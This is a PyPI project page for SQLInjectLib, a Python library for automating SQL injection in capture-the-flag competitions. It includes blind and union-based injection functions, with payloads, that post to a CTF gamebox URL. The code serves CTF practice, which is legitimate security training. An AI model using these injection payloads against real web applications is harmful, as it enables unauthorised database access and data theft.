A library to simplify SQL injections during CTFs
Project description
SQLInjectLib
Introduction
A library to simplify SQL injections during CTFs
Code samples
Extracted from a CTF, some parts were omitted
Blind Injection
def blind_injection(q: SQL[bool]) -> bool: query = f"animals1' and ({q})--" final_query = replace_all(query) c = post( "http://gamebox1.reply.it/dc5ff0efae41b3500b9ebc0ee9ee5a78c98f41a9/", data={"query": final_query}, ) return "ANIMALS1" in c.textUnion Injection
def union_injection(q: SQL[str]) -> str | None: query = f"hdjhfjdf' union select 'aa','aa;aa',{q},1--" final_query = replace_all(query) c = post( "http://gamebox1.reply.it/dc5ff0efae41b3500b9ebc0ee9ee5a78c98f41a9/", data={"query": final_query}, ) m = TAG_FINDER.search(c.text) result = m.group(1) return result
Installation
Install locally with:
python3 -m pip install sqlinjectlib
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
sqlinjectlib-0.1.1.tar.gz
(22.0 kB
view hashes)
Built Distribution
Close
Hashes for sqlinjectlib-0.1.1-py3-none-any.whl
Algorithm | Hash digest | |
---|---|---|
SHA256 | bd71e0e0d173bd90838a3a900045ca5d541e453614191cc769952f8b32448f69 |
|
MD5 | 3daa727c0bb9663d3a1d7822e8ec7cc4 |
|
BLAKE2b-256 | e033e64c28f08bfbc5e0cb00f522cca511b2041244fbc61047b65e646b639b9d |